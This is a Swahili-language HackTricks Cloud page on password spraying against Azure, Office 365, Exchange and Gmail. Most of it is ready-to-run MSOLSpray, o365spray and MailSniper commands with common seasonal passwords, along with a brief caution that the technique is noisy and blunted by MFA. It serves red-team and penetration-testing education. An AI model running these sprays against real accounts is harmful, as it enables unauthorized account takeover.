Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

Az - Password Spraying

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Kupiga Nywila

Katika Azure hii inaweza kufanywa dhidi ya vielelezo tofauti vya API kama Azure AD Graph, Microsoft Graph, Huduma ya Ripoti ya Office 365, n.k.

Hata hivyo, kumbuka kuwa mbinu hii ni kelele sana na Timu ya Bluu inaweza kuibaini kwa urahisi. Zaidi ya hayo, utata wa lazima wa nywila na matumizi ya MFA yanaweza kufanya mbinu hii iwe isiyo na maana.

Unaweza kufanya shambulio la kupiga nywila kwa kutumia MSOLSpray

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

Au kwa o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

Au kwa MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt
Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)!

Njia nyingine za kusaidia HackTricks:

PreviousAz - Device Code Authentication PhishingNextAz - Services

Last updated